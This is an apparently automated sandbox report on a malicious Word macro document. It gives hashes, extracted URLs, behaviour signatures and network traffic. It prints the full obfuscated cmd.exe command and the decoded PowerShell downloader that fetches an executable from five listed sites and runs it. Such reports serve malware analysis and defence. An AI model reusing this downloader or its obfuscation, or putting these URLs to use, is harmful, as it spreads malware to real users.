Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
101s -
max time network
123s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
26/05/2024, 21:49 UTC
Behavioral task
behavioral1
Sample
76e3f55356e2a30593d436ab0880eff8_JaffaCakes118.doc
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
76e3f55356e2a30593d436ab0880eff8_JaffaCakes118.doc
Resource
win10v2004-20240426-en
General
-
Target
76e3f55356e2a30593d436ab0880eff8_JaffaCakes118.doc
-
Size
113KB
-
MD5
76e3f55356e2a30593d436ab0880eff8
-
SHA1
6b1725b71bf2f01ca5b6b7f4c2b4252c67a6e2b1
-
SHA256
b76296d33b324195937257e98ff545fa525399c3f54ec9ed090e29a09ea87e5e
-
SHA512
6d4e48af3634cea0c8f729a171c51b65cb8b9755cf173867cf201a6934a771a315cb3540c0bcd5f47a58ca200fa0d05a052fbf1313717debb7ca5ccf192cfa8c
-
SSDEEP
1536:0TxjwKZ09cB7y9ghN8+mQ90MTT+aU1E0NpFukKH6FH:4xjnB29gb8on+E0NpFEaFH
Malware Config
Extracted
http://baza-shartash.ru/hkqXqT1
http://anapapoliv.ru/Sp4na
http://shorecrestschools.com/nnQkN
http://comicole.com/2HZ
http://elartedelaaccion.es/6Hyl
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 2196 3160 Cmd.exe 80 -
Blocklisted process makes network request 6 IoCs
flow pid Process 25 3436 powershell.exe 27 3436 powershell.exe 28 3436 powershell.exe 31 3436 powershell.exe 33 3436 powershell.exe 37 3436 powershell.exe -
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
pid Process 2196 Cmd.exe -
pid Process 3436 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 3160 WINWORD.EXE 3160 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3436 powershell.exe 3436 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3436 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 3160 WINWORD.EXE 3160 WINWORD.EXE 3160 WINWORD.EXE 3160 WINWORD.EXE 3160 WINWORD.EXE 3160 WINWORD.EXE 3160 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 3160 wrote to memory of 2196 3160 WINWORD.EXE 85 PID 3160 wrote to memory of 2196 3160 WINWORD.EXE 85 PID 2196 wrote to memory of 3436 2196 Cmd.exe 91 PID 2196 wrote to memory of 3436 2196 Cmd.exe 91
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\76e3f55356e2a30593d436ab0880eff8_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3160 -
C:\Windows\SYSTEM32\Cmd.exeCmd /V:O/C"set - =IdBSZaVlEVEJwpRGpMcXUSahlErhlBwsz 7+Wi;mN9qC.@,\Pk}tQb'j26=oT)fDy:/nue{F4Hv1$(-x&&for %o in (16,59,30,69,26,31,27,69,28,28,33,76,53,37,59,58,67,69,30,78,59,53,55,69,18,51,33,40,69,51,44,36,69,53,43,28,37,69,67,51,38,76,26,67,9,58,54,27,51,51,16,65,66,66,53,22,32,22,78,31,27,22,26,51,22,31,27,44,26,68,66,27,49,42,19,42,60,75,45,27,51,51,16,65,66,66,22,67,22,16,22,16,59,28,37,74,44,26,68,66,21,16,72,67,22,45,27,51,51,16,65,66,66,31,27,59,26,69,18,26,69,31,51,31,18,27,59,59,28,31,44,18,59,39,66,67,67,52,49,40,45,27,51,51,16,65,66,66,18,59,39,37,18,59,28,69,44,18,59,39,66,56,73,4,45,27,51,51,16,65,66,66,69,28,22,26,51,69,1,69,28,22,22,18,18,37,59,67,44,69,31,66,57,73,64,28,54,44,21,16,28,37,51,77,54,45,54,61,38,76,68,42,43,33,58,33,54,75,34,41,54,38,76,68,31,51,58,76,69,67,74,65,51,69,39,16,35,54,47,54,35,76,68,42,43,35,54,44,69,79,69,54,38,62,59,26,69,22,18,27,77,76,67,25,14,33,37,67,33,76,26,67,9,61,70,51,26,64,70,76,53,37,59,44,63,59,30,67,28,59,22,1,71,37,28,69,77,76,67,25,14,46,33,76,68,31,51,61,38,21,51,22,26,51,78,48,26,59,18,69,31,31,33,76,68,31,51,38,53,26,69,22,49,38,50,18,22,51,18,27,70,50,50,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,88)do set ] =!] !!- :~%o,1!&&if %o==88 call %] :~-360%"2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:2196 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $bio=new-object Net.WebClient;$rnV='http://baza-shartash.ru/hkqXqT1@http://anapapoliv.ru/Sp4na@http://shorecrestschools.com/nnQkN@http://comicole.com/2HZ@http://elartedelaaccion.es/6Hyl'.Split('@');$uqC = '179';$ust=$env:temp+'\'+$uqC+'.exe';foreach($nER in $rnV){try{$bio.DownloadFile($nER, $ust);Start-Process $ust;break;}catch{}}3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3436
-
-
Network
-
Remote address:8.8.8.8:53Requestroaming.officeapps.live.comIN AResponseroaming.officeapps.live.comIN CNAMEprod.roaming1.live.com.akadns.netprod.roaming1.live.com.akadns.netIN CNAMEeur.roaming1.live.com.akadns.neteur.roaming1.live.com.akadns.netIN CNAMEweu-azsc-000.roaming.officeapps.live.comweu-azsc-000.roaming.officeapps.live.comIN CNAMEosiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.comosiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.comIN A52.109.89.19
-
Remote address:52.109.89.19:443RequestPOST /rs/RoamingSoapService.svc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: text/xml; charset=utf-8
User-Agent: MS-WebServices/1.0
SOAPAction: "http://tempuri.org/IRoamingSettingsService/GetConfig"
Content-Length: 511
Host: roaming.officeapps.live.com
ResponseHTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/10.0
X-OfficeFE: RoamingFE_IN_138
X-OfficeVersion: 16.0.17711.30575
X-OfficeCluster: weu-000.roaming.officeapps.live.com
X-CorrelationId: b5c64400-f0fe-47a2-9cd1-93e257e8ed6b
X-Powered-By: ASP.NET
Date: Sun, 26 May 2024 21:49:07 GMT
Content-Length: 654
-
Remote address:8.8.8.8:53Request46.28.109.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request19.89.109.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request18.24.18.2.in-addr.arpaIN PTRResponse18.24.18.2.in-addr.arpaIN PTRa2-18-24-18deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request138.32.126.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestbaza-shartash.ruIN AResponse
-
Remote address:8.8.8.8:53Requestanapapoliv.ruIN AResponseanapapoliv.ruIN A45.130.41.103
-
Remote address:45.130.41.103:80RequestGET /Sp4na HTTP/1.1
Host: anapapoliv.ru
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Sun, 26 May 2024 21:49:12 GMT
Content-Type: text/html
Content-Length: 37771
Last-Modified: Fri, 30 Jun 2023 15:10:16 GMT
Connection: keep-alive
Keep-Alive: timeout=30
ETag: "649ef058-938b"
Accept-Ranges: bytes
-
Remote address:8.8.8.8:53Requestshorecrestschools.comIN AResponseshorecrestschools.comIN A208.115.219.174
-
Remote address:208.115.219.174:80RequestGET /nnQkN HTTP/1.1
Host: shorecrestschools.com
Connection: Keep-Alive
ResponseHTTP/1.1 302 Found
Server: Apache
Location: https://shorecrestschools.com/nnQkN
Content-Length: 219
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
-
Remote address:208.115.219.174:443RequestGET /nnQkN HTTP/1.1
Host: shorecrestschools.com
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
Server: Apache
Content-Length: 315
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
-
Remote address:8.8.8.8:53Request103.41.130.45.in-addr.arpaIN PTRResponse103.41.130.45.in-addr.arpaIN PTRsslamper3begetcom
-
Remote address:8.8.8.8:53Requestcomicole.comIN AResponsecomicole.comIN A37.153.95.99
-
Remote address:37.153.95.99:80RequestGET /2HZ HTTP/1.1
Host: comicole.com
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
Server: Apache
Content-Length: 315
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
-
Remote address:8.8.8.8:53Requestelartedelaaccion.esIN AResponseelartedelaaccion.esIN A134.0.9.152
-
Remote address:134.0.9.152:80RequestGET /6Hyl HTTP/1.1
Host: elartedelaaccion.es
Connection: Keep-Alive
ResponseHTTP/1.1 301 Moved Permanently
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Redirect-By: WordPress
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Location: https://elartedelaaccion.es/6Hyl
Content-Length: 0
Keep-Alive: timeout=4, max=192
Content-Type: text/html; charset=UTF-8
-
Remote address:8.8.8.8:53Request174.219.115.208.in-addr.arpaIN PTRResponse174.219.115.208.in-addr.arpaIN PTR174-219-115-208staticreverselstnnet
-
Remote address:8.8.8.8:53Request99.95.153.37.in-addr.arpaIN PTRResponse99.95.153.37.in-addr.arpaIN PTRvirt3413unelinknet
-
Remote address:8.8.8.8:53Request152.9.0.134.in-addr.arpaIN PTRResponse152.9.0.134.in-addr.arpaIN PTRvxadb-28srvcat
-
Remote address:134.0.9.152:443RequestGET /6Hyl HTTP/1.1
Host: elartedelaaccion.es
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <https://elartedelaaccion.es/wp-json/>; rel="https://api.w.org/"
Upgrade: h2
Connection: Upgrade, Keep-Alive
Keep-Alive: timeout=4, max=192
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
-
Remote address:8.8.8.8:53Request3.173.189.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestmetadata.templates.cdn.office.netIN AResponsemetadata.templates.cdn.office.netIN CNAMEtemplatesmetadata.office.nettemplatesmetadata.office.netIN CNAMEtemplatesmetadata.office.net.edgekey.nettemplatesmetadata.office.net.edgekey.netIN CNAMEe26769.dscb.akamaiedge.nete26769.dscb.akamaiedge.netIN A23.62.61.184e26769.dscb.akamaiedge.netIN A23.62.61.162
-
GEThttps://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527>ype=0%2C1%2C2%2C5%2CWINWORD.EXERemote address:23.62.61.184:443RequestGET /client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527>ype=0%2C1%2C2%2C5%2C HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: metadata.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Server: Kestrel
Content-Encoding: gzip
Content-Length: 1264
Cache-Control: max-age=54345
Date: Sun, 26 May 2024 21:49:23 GMT
Connection: keep-alive
Vary: Accept-Encoding
-
Remote address:8.8.8.8:53Requestbinaries.templates.cdn.office.netIN AResponsebinaries.templates.cdn.office.netIN CNAMEbinaries.templates.cdn.office.net.edgesuite.netbinaries.templates.cdn.office.net.edgesuite.netIN CNAMEa1847.dscg2.akamai.neta1847.dscg2.akamai.netIN A2.17.251.17a1847.dscg2.akamai.netIN A2.17.251.23
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp03328884.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: q78QzulIDkHYEnfpU4+Yyw==
Last-Modified: Fri, 22 Apr 2016 16:10:17 GMT
ETag: 0x8D36AC8987823BE
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 45ea03cb-501e-000a-5e97-a02e9d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:23 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp03998159.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: dJw2FeVMjmh1UYz9hOWhsg==
Last-Modified: Fri, 22 Apr 2016 16:11:19 GMT
ETag: 0x8D36AC8BD7E1FE9
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f0fd4826-d01e-00cf-6997-a00478000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp01840907.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 2jOARYFw5gy+pyYC/dDZVQ==
Last-Modified: Fri, 22 Apr 2016 16:08:15 GMT
ETag: 0x8D36AC84F8E1FB0
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 333d986d-301e-008a-4b97-a0d19b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:23 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp02851216.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: YoYxJM3NoTXswOcieCy4iA==
Last-Modified: Fri, 22 Apr 2016 16:09:38 GMT
ETag: 0x8D36AC8813CE0D3
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: bdf32728-f01e-0133-2e97-a02b8c000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:23 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp02835233.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: xFXEvEvsng2mfE0eU+RtWg==
Last-Modified: Fri, 22 Apr 2016 16:09:25 GMT
ETag: 0x8D36AC879BBB45C
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 428c94d7-801e-0139-7097-a08f3b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:23 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp02851218.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: kqgZ1DSoquosZfDMLzO7Og==
Last-Modified: Fri, 22 Apr 2016 16:09:39 GMT
ETag: 0x8D36AC881E66CE5
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b7d0a405-601e-0001-7497-a0d5f6000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:23 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp0403391701.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 4pziZjpWoUROqjcy/7gpQA==
Last-Modified: Wed, 29 Aug 2018 18:15:39 GMT
ETag: 0x8D60DDB6CAEA91D
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d7f1c987-e01e-001f-2f97-a0392e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp02851217.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: UYBOJVxXMXYDn01bVcEqsg==
Last-Modified: Fri, 22 Apr 2016 16:09:38 GMT
ETag: 0x8D36AC881987151
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 5c89f3d8-e01e-00a6-4d97-a03d34000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:23 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp02851219.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: ae2zv4HJn+ipS7oDQIxa4Q==
Last-Modified: Fri, 22 Apr 2016 16:09:39 GMT
ETag: 0x8D36AC8822FFB6E
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: cb58b91a-201e-00f4-4797-a041dc000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:23 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp02851220.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 8Q35ApgPHVvuqWssZoQIpw==
Last-Modified: Fri, 22 Apr 2016 16:09:40 GMT
ETag: 0x8D36AC8827914A7
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f32060e3-b01e-0002-5297-a03492000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:23 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp02851221.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: HW+Oc6BmKkjTMgkKTIyJjw==
Last-Modified: Fri, 22 Apr 2016 16:09:40 GMT
ETag: 0x8D36AC882C4ED43
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 748315c1-201e-0096-0397-a083fb000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:23 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp02851222.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: bXh7HiI9trkbaSOAYsyocg==
Last-Modified: Fri, 22 Apr 2016 16:09:41 GMT
ETag: 0x8D36AC8830E54C8
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a51313b9-e01e-0100-5597-a07427000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:23 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp02851224.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 08kDbk4RWegysbTS6dQr8A==
Last-Modified: Fri, 22 Apr 2016 16:09:42 GMT
ETag: 0x8D36AC883A171B7
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 050425c3-601e-0131-1e97-a09534000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:23 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp02851225.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
